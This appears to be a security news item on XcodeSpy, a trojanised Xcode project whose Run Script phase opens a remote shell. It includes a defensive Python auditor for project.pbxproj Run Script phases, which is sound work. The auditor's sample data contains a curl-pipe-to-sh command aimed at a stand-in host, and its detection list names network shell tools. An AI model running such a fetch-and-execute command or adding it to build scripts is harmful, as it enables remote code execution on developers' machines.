Malicious Xcode Project XcodeSpy Targets iOS Devs In Supply-Chain Attack

XcodeSpy malware targets iOS developers and installs a macOS backdoor on the victim's device.

Xcode is a development environment created by Apple that allows users to create apps for macOS, iOS, tvOS, and watchOS.

Threat actors use Xcode to create malicious versions of popular projects, hoping that they will be included in other developers' applications.

The XcodeSpy project is a clone of the legitimate TabBarInteraction project with a malicious 'Run Script' added to it. When the script executes, it opens a remote shell back to the threat actor's server.
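Because the payload sits in a 'Run Script' phase, a developer can list every such phase in a downloaded project's `project.pbxproj` and read the scripts before opening it in Xcode. The following Python sketch is an added example, not code from the original report: the sample project fragment is constructed, the parser assumes Xcode's usual text layout with `isa` as the first key of each object, and the review tokens are illustrative triggers for a closer look rather than XcodeSpy signatures.

```python
import re

# Constructed project.pbxproj fragment (not taken from XcodeSpy).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    AA0000000000000000000001 /* Lint */ = {
      isa = PBXShellScriptBuildPhase;
      shellPath = /bin/sh;
      shellScript = "swiftlint lint --quiet\n";
    };
    AA0000000000000000000002 /* Run Script */ = {
      isa = PBXShellScriptBuildPhase;
      shellPath = /bin/sh;
      shellScript = "curl -s https://example.invalid/setup | sh\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

# Assumption: each object is written as `ID /* name */ = { isa = ...; ... };`
PHASE_RE = re.compile(
    r'(\w+)\s*(?:/\*\s*([^\n]*?)\s*\*/)?\s*=\s*\{\s*'
    r'isa\s*=\s*PBXShellScriptBuildPhase;(.*?)\n\s*\};', re.S)
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";', re.S)
# Illustrative tokens that warrant a manual read (an assumption, not an IoC list).
REVIEW_TOKENS = re.compile(
    r'(?<![\w-])(?:curl|wget|nc|ncat|base64|eval|osascript)(?![\w-])|/dev/tcp/')

def unescape(s):
    """Undo the backslash escapes used inside quoted pbxproj strings."""
    table = {'n': '\n', 't': '\t'}
    return re.sub(r'\\(.)', lambda m: table.get(m.group(1), m.group(1)), s,
                  flags=re.S)

def audit_run_scripts(pbxproj_text):
    """Return one dict per Run Script phase: id, name, script, review hits."""
    findings = []
    for obj_id, name, body in PHASE_RE.findall(pbxproj_text):
        m = SCRIPT_RE.search(body)
        script = unescape(m.group(1)) if m else ''
        hits = sorted({h.group(0) for h in REVIEW_TOKENS.finditer(script)})
        findings.append({'id': obj_id, 'name': name,
                         'script': script, 'hits': hits})
    return findings

if __name__ == '__main__':
    for f in audit_run_scripts(SAMPLE_PBXPROJ):
        flag = 'REVIEW' if f['hits'] else 'ok'
        print(f"[{flag}] {f['id']} ({f['name']}): {f['script'].strip()!r}")
```

An empty `hits` list does not make a script safe; the listing is there so every Run Script phase gets read.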


